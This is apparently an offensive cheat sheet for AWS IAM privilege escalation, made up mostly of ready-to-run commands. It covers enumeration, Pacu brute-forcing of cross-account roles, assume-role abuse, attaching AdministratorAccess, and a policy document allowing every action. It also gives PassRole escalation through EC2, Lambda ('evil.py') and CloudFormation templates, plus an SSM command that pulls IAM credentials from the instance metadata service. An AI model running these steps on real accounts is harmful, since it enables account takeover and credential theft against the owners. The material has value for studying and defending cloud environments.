Skip to content

IAM

Description

With AWS Identity and Access Management (IAM), you can specify who or what can access services and resources in AWS, centrally manage fine-grained permissions, and analyze access to refine permissions across AWS.

Usage

Export secrets :

export AWS_ACCESS_KEY_ID $KEY
export AWS_SECRET_ACCESS_KEY $KEY
export AWS_SESSION_TOKEN $KEY

All the time :

aws iam list-user-policies --user-name ad-admisson
aws iam get-user-policy --user-name ad-admisson --policy-name $POLICY_NAME
aws iam list-roles

Enumeration :

aws configure
aws iam get-user
aws iam list-users
aws iam list-roles
aws iam list-groups-for-user --user-name ad-admisson
aws iam list-user-policies --user-name ad-admisson
aws iam list-policies
aws iam list-attached-user-policies --user-name ad-admisson
aws iam get-user-policy --user-name ad-admisson --policy-name $POLICY_NAME
aws iam list-role-policies --role-name $ROLE_NAME
aws iam get-role-policy --role-name $ROLE_NAME --policy-name $POLICY_NAME
aws iam list-signing-certificates --user-name ad-admisson
aws iam list-ssh-public-keys --user-name ad-admisson
aws iam get-ssh-public-key --user-name ad-admisson --encoding PEM --ssh-public-key-id $ID
aws iam list-mfa-devices
aws iam list-virtual-mfa-devices
aws iam get-login-profile --user-name ad-admisson
aws iam list-groups
aws iam list-group-policies --group-name ad-admisson
aws iam list-attached-group-policies --group-name ad-admisson
aws iam list-instance-profiles

Cross Account Enumeration :

python3 pacu.py
* New session (0)
set-keys
list
run iam__enum_roles --role-name $ROLE_NAME --account-id $ACCOUNT_ID --word-list /root/names.txt
run iam__enum_users --role-name $ROLE_NAME --account-id $ACCOUNT_ID --word-list /root/names.txt

Misconfigured Trust Policy :

We can get AWS secrets unauthenticated.

aws iam get-user-policy --user-name ad-admisson --policy-name $POLICY_NAME
aws sts assume-role --role-arn arn:aws:iam:$AWS_ACCOUNT_ID:role/$ROLE_NAME --role-session-name $ROLE_NAME

Overly Permissive Permission :

We can add attached policy to a user.

aws iam list-policies | grep "AdministratorAccess"
aws iam attached-user-policies --user-name $USERNAME --policy-arn $POLICY_ARN
aws iam create-login-profile --user-name $USERNAME --password $PASSWORD --no-password-reset-required

Dangerous Policy Combination :

aws sts get-caller-identity
* EXPORT VARIABLES
aws iam add-user-to-group --group-name $GROUP_NAME --user-name $USERNAME
* UNSET VARIABLES
aws iam create-policy-version --policy-arn $POLICY_ID --policy-document file.json --set-as-default

file.json

{
  "Version": "2022-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}

Pass Role : EC2

Find AMI id for Amazon Linux 2 AMI :

aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --output json

Check the subnets available in the AWS account :

aws ec2 describe-subnets

Check security groups for ec2 service :

aws ec2 describe-security-groups

Start an ec2 instance using collected details :

aws ec2 run-instances --subnet-id subnet-0b57901260df6b3f3 --image-id ami-0d08a21fc010da680 --iam-instance-profile Name=ec2_admin --instance-type t2.micro --security-group-ids "sg-06407fe95d211b245"

Run commands on the remote ec2 instance using SSM :

aws ssm send-command \ --document-name "AWS-RunShellScript" \ --parameters 'commands=["curl
http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2admin/"]' \ --targets "Key=instanceids,Values=i-0aa5cdcaf86dec148" \
--comment "aws cli 1"

Get the command’s output using SSM :

aws ssm get-command-invocation \
--command-id "0765bff4-4966-446f-a0a2-4e0cdfee565f" \ --instance-id "i-0da83d9b4322af3fa"

Pass Role : Lambda

evil.py

import boto3

def handler(event, context):
  iam = boto3.client("iam")
  response = iam.attach_user_policy(
  UserName="student", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" )
  return response

zip evil-function.zip evil.py
aws lambda create-function \ --function-name evil-function \
--runtime python3.8 \
--zip-file fileb://evil-function.zip \
--handler evil.handler \
--role arn:aws:iam::645723898191:role/lab11lambdaiam

aws lambda invoke --function-name evil-function invoke_out.txt

Pass Role : CloudFormation

new_policy.json

{
  "Resources" : {
    "EvilTemplate" : {
      "Type" : "AWS::IAM::Policy",
      "Properties" : {
        "PolicyName" : "admin_policy",
        "PolicyDocument" : {
          "Version" : "2012-10-17",
          "Statement" : [
          {
            "Effect" : "Allow",
            "Action" : "*",
            "Resource" : "*"
          }
          ]
      },
      "Users" : [
        "student"
      ]
      }
    }
  }
}

aws cloudformation create-stack --stack-name ad-stack --template-body file://new_policy.json --capabilities CAPABILITY_NAMED_IAM --role-arn arn:aws:iam::161176965264:role/lab12CFDeployRole
aws cloudformation describe-stacks --stack-name ad-stack
aws cloudformation describe-stack-events --stack-name ad-stack

References